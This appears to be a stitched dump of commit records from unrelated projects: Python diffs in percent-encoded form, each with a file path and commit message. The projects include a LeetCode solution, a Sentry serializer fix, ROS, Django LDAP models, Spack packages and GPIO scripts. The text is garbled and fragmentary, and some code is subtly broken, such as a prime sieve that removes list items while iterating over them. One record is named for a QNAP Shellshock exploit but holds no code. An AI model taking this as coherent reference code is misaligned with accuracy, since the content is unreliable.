@@ -0,0 +1,1048 @@ +class Solution:%0A def minAbsDifference(self, nums: List%5Bint%5D, goal: int) -%3E int:%0A n = len(nums)%0A nums.sort(key=lambda x: -abs(x))%0A neg = %5B0 for _ in range(n+1)%5D%0A pos = %5B0 for _ in range(n+1)%5D%0A for i in range(n-1, -1, -1):%0A if nums%5Bi%5D %3C 0:%0A neg%5Bi%5D = neg%5Bi+1%5D + nums%5Bi%5D%0A pos%5Bi%5D = pos%5Bi+1%5D%0A else:%0A pos%5Bi%5D = pos%5Bi+1%5D + nums%5Bi%5D%0A neg%5Bi%5D = neg%5Bi+1%5D%0A # print(nums, pos, neg)%0A ans = abs(goal)%0A s = set(%5B0%5D)%0A def check(a, b):%0A if b %3C goal - ans or goal + ans %3C a:%0A return False%0A return True%0A for i in range(n):%0A s = set(%5Bx for x in s if check(x+neg%5Bi%5D, x+pos%5Bi%5D)%5D)%0A # print(s)%0A t = set()%0A for x in s:%0A y = x + nums%5Bi%5D%0A if abs(y - goal) %3C ans:%0A ans = abs(y - goal)%0A t.add(y)%0A s %7C= t%0A return ans%0A %0A %0A %0A
238d031651cb74d0ca9bed9d38cda836049c9c37
Correct fallback for tag name
src/sentry/api/serializers/models/grouptagkey.py
src/sentry/api/serializers/models/grouptagkey.py
from __future__ import absolute_import from sentry.api.serializers import Serializer, register from sentry.models import GroupTagKey, TagKey @register(GroupTagKey) class GroupTagKeySerializer(Serializer): def get_attrs(self, item_list, user): tag_labels = { t.key: t.get_label() for t in TagKey.objects.filter( project=item_list[0].project, key__in=[i.key for i in item_list] ) } result = {} for item in item_list: try: label = tag_labels[item.key] except KeyError: label = item.value result[item] = { 'name': label, } return result def serialize(self, obj, attrs, user): if obj.key.startswith('sentry:'): key = obj.key.split('sentry:', 1)[-1] else: key = obj.key return { 'name': attrs['name'], 'key': key, 'uniqueValues': obj.values_seen, }
Python
0.000005
@@ -627,26 +627,162 @@ -label = item.value +if item.key.startswith('sentry:'):%0A label = item.key.split('sentry:', 1)%5B-1%5D%0A else:%0A label = item.key %0A
bc3495acdc9f53e2fa7d750f3dd7bb53826326e3
Create csvloader.py
csvloader.py
csvloader.py
Python
0.000053
@@ -0,0 +1,379 @@ +import random%0Aimport csv%0Awith open('points.csv', 'wb') as csvfile:%0A writer = csv.writer(csvfile, delimiter=' ',quotechar='%7C', quoting=csv.QUOTE_MINIMAL)%0A%0A row = %5B%5D%0A for i in range(1000):%0A row.append(random.randrange(-2000,1000))%0A row.append(random.randrange(20,1000))%0A row.append(random.randrange(0,3))%0A writer.writerow(row)%0A row = %5B%5D%0A
8fe27d56592978a0d2a2e43b07214f982bad2010
Add intermediate tower 8
pythonwarrior/towers/intermediate/level_008.py
pythonwarrior/towers/intermediate/level_008.py
Python
0.998595
@@ -0,0 +1,907 @@ +# -------%0A# %7C@ Ss C%3E%7C%0A# -------%0A%0Alevel.description(%22You discover a satchel of bombs which will help %22%0A %22when facing a mob of enemies.%22)%0Alevel.tip(%22Detonate a bomb when you see a couple enemies ahead of %22%0A %22you (warrior.look()). Watch out for your health too.%22)%0Alevel.clue(%22Calling warrior.look() will return an array of Spaces. If the %22%0A %22first two contain enemies, detonate a bomb with %22%0A %22warrior.detonate_().%22)%0Alevel.time_bonus(30)%0Alevel.size(7, 1)%0Alevel.stairs(6, 0)%0A%0Adef add_war_abilities(warrior):%0A warrior.add_abilities('look', 'detonate_')%0A%0Alevel.warrior(0, 0, 'east', func=add_war_abilities)%0A%0Adef add_captive_abilities(unit):%0A unit.add_abilities('explode_')%0A unit.abilities_attr%5B'explode_'%5D.time = 9%0A%0Alevel.unit('captive', 5, 0, 'west', func=add_captive_abilities)%0Alevel.unit('thick_sludge', 2, 0, 'west')%0Alevel.unit('sludge', 3, 0, 'west')%0A
5e9c0961c381dcebe0331c8b0db38794de39300b
Initialize P01_fantasy_game_inventory
books/AutomateTheBoringStuffWithPython/Chapter05/PracticeProjects/P01_fantasy_game_inventory.py
books/AutomateTheBoringStuffWithPython/Chapter05/PracticeProjects/P01_fantasy_game_inventory.py
Python
0.000004
@@ -0,0 +1,1027 @@ +# This program models a player's inventory from a fantasy game%0A# You are creating a fantasy video game. The data structure to model the player%E2%80%99s%0A# inventory will be a dictionary where the keys are string values describing the item%0A# in the inventory and the value is an integer value detailing how many of that item%0A# the player has.%0A#%0A# For example, the dictionary value%0A# %7B'rope': 1, 'torch': 6, 'gold coin': 42, 'dagger': 1, 'arrow': 12%7D%0A# means the player has 1 rope, 6 torches, 42 gold coins, and so on.%0A#%0A# Write a function named displayInventory() that would take any possible %E2%80%9Cinventory%E2%80%9D%0A# and display it like the following:%0A# Inventory:%0A# 12 arrow%0A# 42 gold coin%0A# 1 rope%0A# 6 torch%0A# 1 dagger%0A#%0A# Total number of items: 62%0Astuff = %7B'rope': 1, 'torch': 6, 'gold coin': 42, 'dagger': 1, 'arrow': 12%7D%0A%0Adef displayInventory(inventory):%0A print(%22Inventory:%22)%0A item_total = 0%0A for k, v in inventory.items():%0A # FILL THIS PART IN%0A print(%22Total number of items: %22 + str(item_total))%0A%0AdisplayInventory(stuff)%0A
b50811f87d10dab0768feed293e239ca98a91538
fix issue with ptu server and morse topic by correcting and republishing /ptu/state
topic_republisher/scripts/republish_ptu_state.py
topic_republisher/scripts/republish_ptu_state.py
Python
0
@@ -0,0 +1,1078 @@ +#!/usr/bin/env python%0A%0Aimport rospy%0Afrom sensor_msgs.msg import JointState%0A%0Aclass JointStateRepublisher():%0A%09%22A class to republish joint state information%22%0A%0A%09def __init__(self):%0A%09%09rospy.init_node('ptu_state_republisher')%0A%09%09self.pub = rospy.Publisher('/ptu/state', JointState)%0A rospy.Subscriber(%22/ptu_state%22, JointState, self.callback)%0A%09%09rospy.loginfo(rospy.get_name() + %22 setting up%22)%0A%0A%09def callback(self,data):%0A rospy.logdebug(rospy.get_name() + %22: I heard %25s, %25s%22, data.name, data.position)%0A %0A pan_idx = data.name.index('pan')%0A tilt_idx = data.name.index('tilt')%0A %0A js = JointState()%0A%0A js.header = data.header%0A js.name.append(data.name%5Bpan_idx%5D)%0A js.name.append(data.name%5Btilt_idx%5D)%0A js.position.append(data.position%5Bpan_idx%5D)%0A js.position.append(data.position%5Btilt_idx%5D)%0A%0A self.pub.publish(js)%0A%0Aif __name__ == '__main__':%0A republisher = JointStateRepublisher()%0A rospy.spin()%0A
c4d65e8720b8d79cf19cca6b2f928e3dccd7e888
Convert birthday to DateField
okupy/accounts/models.py
okupy/accounts/models.py
# vim:fileencoding=utf8:et:ts=4:sts=4:sw=4:ft=python from django.conf import settings from django.db import models from ldapdb.models.fields import (CharField, IntegerField, ListField, FloatField, ACLField) import ldapdb.models class Queue(models.Model): username = models.CharField(max_length=100, unique=True) password = models.CharField(max_length=30) first_name = models.CharField(max_length=100) last_name = models.CharField(max_length=100) email = models.EmailField(max_length=254, unique=True) token = models.CharField(max_length=40) class LDAPUser(ldapdb.models.Model): """ Class representing an LDAP user entry """ # LDAP metadata base_dn = settings.AUTH_LDAP_USER_BASE_DN object_classes = settings.AUTH_LDAP_USER_OBJECTCLASS # top object_class = ListField(db_column='objectClass') # person last_name = CharField(db_column='sn') full_name = CharField(db_column='cn') description = CharField(db_column='description') phone = CharField(db_column='telephoneNumber', blank=True) password = ListField(db_column='userPassword') # inetOrgPerson first_name = CharField(db_column='givenName') email = ListField(db_column='mail') username = CharField(db_column='uid', primary_key=True) # posixAccount uid = IntegerField(db_column='uidNumber', unique=True) gid = IntegerField(db_column='gidNumber') gecos = CharField(db_column='gecos') home_directory = CharField(db_column='homeDirectory') login_shell = CharField(db_column='loginShell', default='/bin/bash') # ldapPublicKey ssh_key = ListField(db_column='sshPublicKey') # gentooGroup ACL = ListField(db_column='gentooACL') birthday = CharField(db_column='birthday') gentoo_join_date = ListField(db_column='gentooJoin') gentoo_retire_date = ListField(db_column='gentooRetire') developer_bug = ListField(db_column='gentooDevBug') location = CharField(db_column='gentooLocation') mentor = ListField(db_column='gentooMentor') im = ListField(db_column='gentooIM') gpg_fingerprint = ListField(db_column='gpgfingerprint') gpg_key = ListField(db_column='gpgKey') latitude = FloatField(db_column='lat') longitude = FloatField(db_column='lon') # gentooDevGroup roles = CharField(db_column='gentooRoles') alias = ListField(db_column='gentooAlias') spf = ListField(db_column='gentooSPF') # additional ACL fields based on gentooACL is_user = ACLField(db_column='gentooACL') is_developer = ACLField(db_column='gentooACL') is_foundation = ACLField(db_column='gentooACL') is_staff = ACLField(db_column='gentooACL') is_docs = ACLField(db_column='gentooACL') is_council = ACLField(db_column='gentooACL') is_trustee = ACLField(db_column='gentooACL') is_overlays = ACLField(db_column='gentooACL') is_planet = ACLField(db_column='gentooACL') is_wiki = ACLField(db_column='gentooACL') is_forums = ACLField(db_column='gentooACL') is_security = ACLField(db_column='gentooACL') is_recruiter = ACLField(db_column='gentooACL') is_undertaker = ACLField(db_column='gentooACL') is_pr = ACLField(db_column='gentooACL') is_infra = ACLField(db_column='gentooACL') is_retired = ACLField(db_column='gentooACL') def __str__(self): return self.username def __unicode__(self): return self.username # Models for OpenID data store class OpenID_Nonce(models.Model): server_uri = models.URLField(max_length=2048) ts = models.DateTimeField() salt = models.CharField(max_length=40) class Meta: unique_together = ('server_uri', 'ts', 'salt') class OpenID_Association(models.Model): server_uri = models.URLField(max_length=2048) handle = models.CharField(max_length=255) # TODO: BinaryField in newer versions of django secret = models.CharField(max_length=128) issued = models.DateTimeField() expires = models.DateTimeField() assoc_type = models.CharField(max_length=64) class Meta: unique_together = ('server_uri', 'handle') class OpenID_Attributes(models.Model): """ An attribute choice for submission to the site requesting auth. """ nickname = models.NullBooleanField('Nickname', default=True) email = models.NullBooleanField('E-mail address', default=True) fullname = models.NullBooleanField('Full name', default=True) # XXX: OpenID allows disabling invidual components dob = models.NullBooleanField('Date of birth', default=True) gender = models.NullBooleanField('Gender', default=True) postcode = models.NullBooleanField('Postal code', default=True) country = models.NullBooleanField('Country', default=True) language = models.NullBooleanField('Language', default=True) timezone = models.NullBooleanField('Time zone', default=True)
Python
0.999999
@@ -233,16 +233,27 @@ ACLField +, DateField )%0Aimport @@ -1754,28 +1754,28 @@ birthday = -Char +Date Field(db_col
007b2d2ce61864e87de368e508fa971864847fc7
Create findPrimes.py
findPrimes.py
findPrimes.py
Python
0
@@ -0,0 +1,455 @@ +# Tyler Witt%0A# findPrimes.py%0A# 6.27.14%0A# ver 1.0%0A%0A# This function implements the Sieve of Eratosthenes algorithm to find all the prime numbers below lim%0A%0Adef findPrimes(lim):%0A primes = %5B%5D%0A cur = 0%0A if lim %3C 2:%0A return None%0A for num in range(2, lim + 1):%0A primes.append(num)%0A while (primes%5Bcur%5D ** 2 %3C lim):%0A for val in primes:%0A if val %25 primes%5Bcur%5D == 0 and val != primes%5Bcur%5D:%0A primes.remove(val)%0A cur += 1%0A return (primes)%0A
80f294e134ef684feb8ac700747a65522edf8758
add new example in the gallery
examples/plot_kraken.py
examples/plot_kraken.py
Python
0
@@ -0,0 +1,1563 @@ +%22%22%22%0AKraken module example%0A=======================%0A%0Akraken module showing distribution of the most frequent taxons%0APlease, see :mod:%60sequana.kraken%60 for more information and the%0Aquality_taxon pipeline module or kraken rule.%0A%22%22%22%0A#This plots a simple taxonomic representation of the output%0A#of the taxonomic pipeline. A more complete and interactive %0A#representatino using krona is available when using the %0A#quality_taxon pipeline in Sequana.%0A%0A%0A##############################################%0A# test %0Afrom sequana import KrakenContaminant%0Ak = KrakenContaminant(%22kraken.out%22, verbose=False)%0Ak.plot(kind='pie')%0A%0A%0A####################################################%0A# The input file **kraken.out** is the output of the %0A# Kraken tool. It is a ste of rows such as those ones::%0A#%0A# C HISEQ:426:C5T65ACXX:5:2301:5633:7203 11234 203 0:2 11234:1 0:1 11234:1 0:2 11234:1 0:13 11234:1 0:1 11234:1 0:3 11234:1 0:16 11234:1 0:5 11234:1 0:6 11234:1 0:13 A:31 0:33 11234:1 0:29 11234:1 0:7%0A# C HISEQ:426:C5T65ACXX:5:2301:5815:7120 11234 203 0:4 11234:1 0:12 11234:1 0:22 11234:1 0:1 0 11234:1 0:5 11234:1 0:7 11234:1 0:5 A:31 0:3 11234:1 0:22 11234:1 0:18 11234:1 0:24 11234:1%0A#%0A#%0A# The KrakenContaminant class will read the file, download a taxonomic database%0A# from EBI, map the taxon found in the **kraken.out** file and figure out the%0A# lineage. In the example above, only the scientific name is found. In the%0A# snakefile provided in Sequana, the full pipeline produces a full lineage%0A# representation using krona tool.%0A#%0A# .. seealso:: :ref:%60pipelines%60%0A%0A
341ca75484b4607eb632d52bf257c8190ebf8a3b
Create fishspine3.py
fishspine3.py
fishspine3.py
Python
0.000005
@@ -0,0 +1,30 @@ +#Fish vertebral location code%0A
11f1079598d446607f11fb3bff9ee41b2c852ac0
Update sync queue time estimation
stats_cron.py
stats_cron.py
from tapiriik.database import db, close_connections from datetime import datetime, timedelta # total distance synced distanceSyncedAggr = db.sync_stats.aggregate([{"$group": {"_id": None, "total": {"$sum": "$Distance"}}}])["result"] if distanceSyncedAggr: distanceSynced = distanceSyncedAggr[0]["total"] else: distanceSynced = 0 # last 24hr, for rate calculation lastDayDistanceSyncedAggr = db.sync_stats.aggregate([{"$match": {"Timestamp": {"$gt": datetime.utcnow() - timedelta(hours=24)}}}, {"$group": {"_id": None, "total": {"$sum": "$Distance"}}}])["result"] if lastDayDistanceSyncedAggr: lastDayDistanceSynced = lastDayDistanceSyncedAggr[0]["total"] else: lastDayDistanceSynced = 0 # similarly, last 1hr lastHourDistanceSyncedAggr = db.sync_stats.aggregate([{"$match": {"Timestamp": {"$gt": datetime.utcnow() - timedelta(hours=1)}}}, {"$group": {"_id": None, "total": {"$sum": "$Distance"}}}])["result"] if lastHourDistanceSyncedAggr: lastHourDistanceSynced = lastHourDistanceSyncedAggr[0]["total"] else: lastHourDistanceSynced = 0 # sync wait time, to save making 1 query/sec-user-browser queueHead = list(db.users.find({"NextSynchronization": {"$lte": datetime.utcnow()}, "SynchronizationWorker": None, "SynchronizationHostRestriction": {"$exists": False}}, {"NextSynchronization": 1}).sort("NextSynchronization").limit(10)) queueHeadTime = timedelta(0) if len(queueHead): for queuedUser in queueHead: queueHeadTime += datetime.utcnow() - queuedUser["NextSynchronization"] queueHeadTime /= len(queueHead) # sync time utilization db.sync_worker_stats.remove({"Timestamp": {"$lt": datetime.utcnow() - timedelta(hours=1)}}) # clean up old records timeUsedAgg = db.sync_worker_stats.aggregate([{"$group": {"_id": None, "total": {"$sum": "$TimeTaken"}}}])["result"] totalSyncOps = db.sync_worker_stats.count() if timeUsedAgg: timeUsed = timeUsedAgg[0]["total"] avgSyncTime = timeUsed / totalSyncOps else: timeUsed = 0 avgSyncTime = 0 # error/pending/locked stats lockedSyncRecords = db.users.aggregate([ {"$match": {"SynchronizationWorker": {"$ne": None}}}, {"$group": {"_id": None, "count": {"$sum": 1}}} ]) if len(lockedSyncRecords["result"]) > 0: lockedSyncRecords = lockedSyncRecords["result"][0]["count"] else: lockedSyncRecords = 0 pendingSynchronizations = db.users.aggregate([ {"$match": {"NextSynchronization": {"$lt": datetime.utcnow()}}}, {"$group": {"_id": None, "count": {"$sum": 1}}} ]) if len(pendingSynchronizations["result"]) > 0: pendingSynchronizations = pendingSynchronizations["result"][0]["count"] else: pendingSynchronizations = 0 usersWithErrors = db.users.aggregate([ {"$match": {"NonblockingSyncErrorCount": {"$gt": 0}}}, {"$group": {"_id": None, "count": {"$sum": 1}}} ]) if len(usersWithErrors["result"]) > 0: usersWithErrors = usersWithErrors["result"][0]["count"] else: usersWithErrors = 0 totalErrors = db.users.aggregate([ {"$group": {"_id": None, "total": {"$sum": "$NonblockingSyncErrorCount"}}} ]) if len(totalErrors["result"]) > 0: totalErrors = totalErrors["result"][0]["total"] else: totalErrors = 0 db.sync_status_stats.insert({ "Timestamp": datetime.utcnow(), "Locked": lockedSyncRecords, "Pending": pendingSynchronizations, "ErrorUsers": usersWithErrors, "TotalErrors": totalErrors, "SyncTimeUsed": timeUsed, "SyncQueueHeadTime": queueHeadTime.total_seconds() }) db.stats.update({}, {"$set": {"TotalDistanceSynced": distanceSynced, "LastDayDistanceSynced": lastDayDistanceSynced, "LastHourDistanceSynced": lastHourDistanceSynced, "TotalSyncTimeUsed": timeUsed, "AverageSyncDuration": avgSyncTime, "LastHourSynchronizationCount": totalSyncOps, "QueueHeadTime": queueHeadTime.total_seconds(), "Updated": datetime.utcnow()}}, upsert=True) def aggregateCommonErrors(): from bson.code import Code # The exception message always appears right before "LOCALS:" map_operation = Code( "function(){" "var errorMatch = new RegExp(/\\n([^\\n]+)\\n\\nLOCALS:/);" "if (!this.SyncErrors) return;" "var id = this._id;" "var svc = this.Service;" "this.SyncErrors.forEach(function(error){" "var message = error.Message.match(errorMatch)[1];" "var key = {service: svc, stem: message.substring(0, 60)};" "emit(key, {count:1, connections:[id], exemplar:message});" "});" "}" ) reduce_operation = Code( "function(key, item){" "var reduced = {count:0, connections:[]};" "var connection_collections = [];" "item.forEach(function(error){" "reduced.count+=error.count;" "reduced.exemplar = error.exemplar;" "connection_collections.push(error.connections);" "});" "reduced.connections = reduced.connections.concat.apply(reduced.connections, connection_collections);" "return reduced;" "}") db.connections.map_reduce(map_operation, reduce_operation, "common_sync_errors") #, finalize=finalize_operation # We don't need to do anything with the result right now, just leave it there to appear in the dashboard aggregateCommonErrors() close_connections()
Python
0
@@ -1,12 +1,16 @@ + from tapirii @@ -1176,35 +1176,24 @@ .find(%7B%22 -NextSynchronization +QueuedAt %22: %7B%22$lt @@ -1308,59 +1308,37 @@ , %7B%22 -NextSynchronization%22: 1%7D).sort(%22NextSynchronization +QueuedAt%22: 1%7D).sort(%22QueuedAt %22).l @@ -1489,35 +1489,24 @@ edUser%5B%22 -NextSynchronization +QueuedAt %22%5D%0D%0A
653ab8128de3c08b6b8be0d662f12ef5a3edf6b2
Add grafana build rule
shipyard/rules/third-party/grafana/build.py
shipyard/rules/third-party/grafana/build.py
Python
0.000001
@@ -0,0 +1,1581 @@ +from foreman import get_relpath, rule%0A%0Afrom garage import scripts%0A%0Afrom templates.common import define_distro_packages%0A%0A%0AGRAFANA_DEB = 'grafana_5.1.4_amd64.deb'%0AGRAFANA_DEB_URI = 'https://s3-us-west-2.amazonaws.com/grafana-releases/release/grafana_5.1.4_amd64.deb'%0AGRAFANA_DEB_CHECKSUM = 'sha256-bbec4cf6112c4c2654b679ae808aaad3b3e4ba39818a6d01f5f19e78946b734e'%0A%0A%0Adefine_distro_packages(%5B%0A 'adduser',%0A 'libfontconfig',%0A%5D)%0A%0A%0A@rule%[email protected]('//base:build')%[email protected]('install_packages')%0Adef build(parameters):%0A drydock_src = parameters%5B'//base:drydock'%5D / get_relpath()%0A scripts.mkdir(drydock_src)%0A with scripts.directory(drydock_src):%0A deb_path = drydock_src / GRAFANA_DEB%0A if not deb_path.exists():%0A scripts.wget(GRAFANA_DEB_URI, deb_path)%0A scripts.ensure_checksum(deb_path, GRAFANA_DEB_CHECKSUM)%0A with scripts.using_sudo():%0A scripts.execute(%5B'dpkg', '--install', deb_path%5D)%0A%0A%0A@rule%[email protected]('build')%[email protected]_depend('//base:tapeout')%0Adef tapeout(parameters):%0A with scripts.using_sudo():%0A rootfs = parameters%5B'//base:drydock/rootfs'%5D%0A scripts.rsync(%0A %5B%0A '/usr/sbin/grafana-server',%0A '/usr/share/grafana',%0A %5D,%0A rootfs,%0A relative=True,%0A )%0A%0A%0A@rule%[email protected]('//base:tapeout')%0Adef trim_usr(parameters):%0A rootfs = parameters%5B'//base:drydock/rootfs'%5D%0A with scripts.using_sudo():%0A scripts.rm(rootfs / 'usr/lib', recursive=True)%0A scripts.rm(rootfs / 'usr/local/lib', recursive=True)%0A
4dd0b349f971cd5ba4842f79a7dba36bf4999b6f
Add Jmol package (#3041)
var/spack/repos/builtin/packages/jmol/package.py
var/spack/repos/builtin/packages/jmol/package.py
Python
0
@@ -0,0 +1,1959 @@ +##############################################################################%0A# Copyright (c) 2013-2016, Lawrence Livermore National Security, LLC.%0A# Produced at the Lawrence Livermore National Laboratory.%0A#%0A# This file is part of Spack.%0A# Created by Todd Gamblin, [email protected], All rights reserved.%0A# LLNL-CODE-647188%0A#%0A# For details, see https://github.com/llnl/spack%0A# Please also see the LICENSE file for our notice and the LGPL.%0A#%0A# This program is free software; you can redistribute it and/or modify%0A# it under the terms of the GNU Lesser General Public License (as%0A# published by the Free Software Foundation) version 2.1, February 1999.%0A#%0A# This program is distributed in the hope that it will be useful, but%0A# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF%0A# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and%0A# conditions of the GNU Lesser General Public License for more details.%0A#%0A# You should have received a copy of the GNU Lesser General Public%0A# License along with this program; if not, write to the Free Software%0A# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA%0A##############################################################################%0Afrom spack import *%0Afrom distutils.dir_util import copy_tree%0A%0A%0Aclass Jmol(Package):%0A %22%22%22Jmol: an open-source Java viewer for chemical structures in 3D%0A with features for chemicals, crystals, materials and biomolecules.%22%22%22%0A%0A homepage = %22http://jmol.sourceforge.net/%22%0A url = %22https://sourceforge.net/projects/jmol/files/Jmol/Version%252014.8/Jmol%252014.8.0/Jmol-14.8.0-binary.tar.gz%22%0A%0A version('14.8.0', '3c9f4004b9e617ea3ea0b78ab32397ea')%0A%0A depends_on('jdk', type='run')%0A%0A def install(self, spec, prefix):%0A copy_tree('jmol-%7B0%7D'.format(self.version), prefix)%0A%0A def setup_environment(self, spack_env, run_env):%0A run_env.prepend_path('PATH', self.prefix)%0A run_env.set('JMOL_HOME', self.prefix)%0A
dc635babcf78343bf9490a77d716db89bda2698b
Create __init__.py
api_1_0/__init__.py
api_1_0/__init__.py
Python
0.000429
@@ -0,0 +1,125 @@ +from flask import Blueprint %0A%0Aapi = Blueprint('api', __name__)%0A%0Afrom . import authentication, posts, users, comments, errors%0A
7d29c44e19c1f06deb0722a3df51501b39566c4b
Implement simple en/decoding command line tool
flynn/tool.py
flynn/tool.py
Python
0.000108
@@ -0,0 +1,1282 @@ +# coding: utf-8%0A%0Aimport sys%0Aimport argparse%0A%0Aimport flynn%0Aimport json%0A%0Adef main(args=sys.argv%5B1:%5D):%0A%09formats = %7B%22json%22, %22cbor%22, %22cbori%22, %22cborh%22, %22cborhi%22%7D%0A%09argparser = argparse.ArgumentParser()%0A%09argparser.add_argument(%22-i%22, %22--input-format%22, choices=formats, default=%22cbor%22)%0A%09argparser.add_argument(%22-o%22, %22--output-format%22, choices=formats, default=%22cbor%22)%0A%09args = argparser.parse_args(args)%0A%09if args.input_format in %7B%22cbor%22, %22cbori%22%7D:%0A%09%09input_format = %22cbor%22%0A%09else:%0A%09%09input_format = args.input_format%0A%09output_format = args.output_format%0A%0A%09intermediate = None%0A%09if input_format in %7B%22cbor%22, %22cbori%22%7D:%0A%09%09intermediate = flynn.load(sys.stdin.raw)%0A%09elif input_format in %7B%22cborh%22, %22cborhi%22%7D:%0A%09%09intermediate = flynn.loadh(sys.stdin.read())%0A%09elif input_format == %22json%22:%0A%09%09intermediate = json.load(sys.stdin)%0A%0A%09if output_format == %22cbor%22:%0A%09%09flynn.dump(intermediate, sys.stdout.raw)%0A%09elif output_format == %22cbori%22:%0A%09%09flynn.dump(intermediate, sys.stdout.raw, cls=flynn.encoder.InfiniteEncoder)%0A%09elif output_format == %22cborh%22:%0A%09%09sys.stdout.write(flynn.dumph(intermediate))%0A%09elif output_format == %22cborhi%22:%0A%09%09sys.stdout.write(flynn.dumph(intermediate, cls=flynn.encoder.InfiniteEncoder))%0A%09elif output_format == %22json%22:%0A%09%09json.dump(intermediate, sys.stdout)%0A%0Aif __name__ == %22__main__%22:%0A%09main()%0A%0A
5af92f3905f2d0101eeb42ae7cc51bff528ea6ea
Write bodies given by coordinates to a VTK file
syngeo/io.py
syngeo/io.py
Python
0.000001
@@ -0,0 +1,846 @@ +# stardard library%0Aimport sys, os%0A%0A# external libraries%0Aimport numpy as np%0Afrom ray import imio, evaluate%0A%0Adef add_anything(a, b):%0A return a + b%0A%0Adef write_synapse_to_vtk(neurons, coords, fn, im=None, t=(2,0,1), s=(1,-1,1),%0A margin=None):%0A %22%22%22Output neuron shapes around pre- and post-synapse coordinates.%0A %0A The coordinate array is a (n+1) x m array, where n is the number of %0A post-synaptic sites (fly neurons are polyadic) and m = neurons.ndim, the%0A number of dimensions of the image.%0A %22%22%22%0A neuron_ids = neurons%5Bzip(*(coords%5B:,t%5D*s))%5D%0A synapse_volume = reduce(add_anything, %0A %5B(i+1)*(neurons==j) for i, j in enumerate(neuron_ids)%5D)%0A imio.write_vtk(synapse_volume, fn)%0A if im is not None:%0A imio.write_vtk(im, %0A os.path.join(os.path.dirname(fn), 'image.' + os.path.basename(fn)))%0A
e6e90cef36551796f7fb06585c67508538ce113f
Create MaxCounters.py
Counting-Elements/MaxCounters.py
Counting-Elements/MaxCounters.py
Python
0
@@ -0,0 +1,407 @@ +# https://codility.com/demo/results/trainingTC7JSX-8E9/%0Adef solution(N, A):%0A counters = N * %5B0%5D%0A max_counters = 0%0A for elem in A:%0A if elem == N+1:%0A counters = N * %5Bmax_counters%5D%0A else:%0A this_elem = counters%5Belem-1%5D + 1%0A counters%5Belem-1%5D = this_elem%0A if this_elem %3E max_counters:%0A max_counters = this_elem%0A return counters%0A
ce1d13bc6827f780e44491b630e64df7b52634f1
add vibration sensor code
gpio/vibration-sendor-test.py
gpio/vibration-sendor-test.py
Python
0
@@ -0,0 +1,640 @@ +import RPi.GPIO as GPIO%0Aimport time%0Aimport datetime%0A%0AGPIO.setwarnings(False)%0AGPIO.setmode(GPIO.BCM)%0AIN_PIN = 18%0ALED_PIN = 17%0A%0AGPIO.setup(IN_PIN, GPIO.IN, pull_up_down=GPIO.PUD_UP) %0AGPIO.setup(LED_PIN, GPIO.OUT)%0A%0AGPIO.output(LED_PIN, GPIO.LOW)%0A%0Adef turn_on(led_pin):%0A GPIO.output(led_pin, GPIO.HIGH)%0A%0Adef turn_off(led_pin):%0A GPIO.output(led_pin, GPIO.LOW)%0A%0Acount = 0%0Awhile True:%0A i=GPIO.input(IN_PIN) %0A if(count == 1000):%0A turn_off(LED_PIN)%0A count += 1%0A if i==1: %0A print(datetime.datetime.now(), %22Vibration detected%22,i)%0A time.sleep(0.1)%0A count = 0%0A turn_on(LED_PIN)%0A
e7ef1806f84e6d07ef88ca23444f37cf6f50e014
Add a console-less version.
wxMailServer.pyw
wxMailServer.pyw
Python
0
@@ -0,0 +1,94 @@ +# -*- encoding: utf-8 -*-%0Afrom wxMailServer import main%0A%0Aif __name__ == %22__main__%22:%0A main()
b419f8c9f562d3d16a6079e949c47ec2adc4c97d
add utility script for merging test files
scripts/merge-tests.py
scripts/merge-tests.py
Python
0
@@ -0,0 +1,1367 @@ +import sys%0A%0Ac_includes = set()%0Acxx_includes = set()%0Ajive_includes = set()%0Alocal_includes = set()%0A%0Acode_blocks = %5B%5D%0A%0Adef mangle(fname):%0A%09name = fname%5B6:-2%5D%0A%09name = name.replace('/', '_')%0A%09name = name.replace('-', '_')%0A%09return name%0A%0Afor fname in sys.argv%5B1:%5D:%0A%09seen_includes = False%0A%09code_lines = %5B%5D%0A%09name = mangle(fname)%0A%09for line in file(fname).readlines():%0A%09%09line = line%5B:-1%5D%0A%09%09if line%5B:9%5D == %22#include %22:%0A%09%09%09include = line%5B9:%5D%0A%09%09%09if include%5B:6%5D == %22%3Cjive/%22:%0A%09%09%09%09jive_includes.add(include)%0A%09%09%09elif include%5B-3:%5D == %22.h%3E%22:%0A%09%09%09%09c_includes.add(include)%0A%09%09%09elif include%5B0%5D == '%22':%0A%09%09%09%09local_includes.add(include)%0A%09%09%09else:%0A%09%09%09%09cxx_includes.add(include)%0A%09%09%09seen_includes = True%0A%09%09%09continue%0A%09%09if not seen_includes: continue%0A%09%09line = line + '%5Cn'%0A%09%09if line == '%5Cn' and code_lines and code_lines%5B-1%5D == '%5Cn':%0A%09%09%09continue%0A%09%09line = line.replace('test_main', name)%0A%09%09code_lines.append(line)%0A%09code_blocks.append(''.join(code_lines))%0A%0Aout = sys.stdout%0A%0Aif local_includes:%0A%09for i in sorted(local_includes): out.write('#include %25s%5Cn' %25 i)%0A%09out.write('%5Cn')%0A%0Aif c_includes:%0A%09for i in sorted(c_includes): out.write('#include %25s%5Cn' %25 i)%0A%09out.write('%5Cn')%0A%0Aif cxx_includes:%0A%09for i in sorted(cxx_includes): out.write('#include %25s%5Cn' %25 i)%0A%09out.write('%5Cn')%0A%0Aif jive_includes:%0A%09for i in sorted(jive_includes): out.write('#include %25s%5Cn' %25 i)%0A%09out.write('%5Cn')%0A%0Afor c in code_blocks: out.write(c)%0A
62e17c30ba45458254c0da5b14582aeeac9eab4c
Add command to pre-generate all jpeg images
signbank/video/management/commands/makejpeg.py
signbank/video/management/commands/makejpeg.py
Python
0.000001
@@ -0,0 +1,606 @@ +%22%22%22Convert a video file to flv%22%22%22%0A%0Afrom django.core.exceptions import ImproperlyConfigured%0Afrom django.core.management.base import BaseCommand, CommandError %0Afrom django.conf import settings%0Afrom signbank.video.models import GlossVideo%0Aimport os%0A%0Aclass Command(BaseCommand):%0A %0A help = 'Create JPEG images for all videos'%0A args = ''%0A%0A def handle(self, *args, **options):%0A %0A # just access the poster path for each video%0A for vid in GlossVideo.objects.all():%0A p = vid.poster_path()%0A print p%0A %0A else:%0A print %22Usage makejpeg%22%0A%0A%0A
83d8199eccf7261a8e2f01f7665537ee31702f8c
Create QNAP_Shellshock.py
QNAP_Shellshock.py
QNAP_Shellshock.py
Python
0.000001
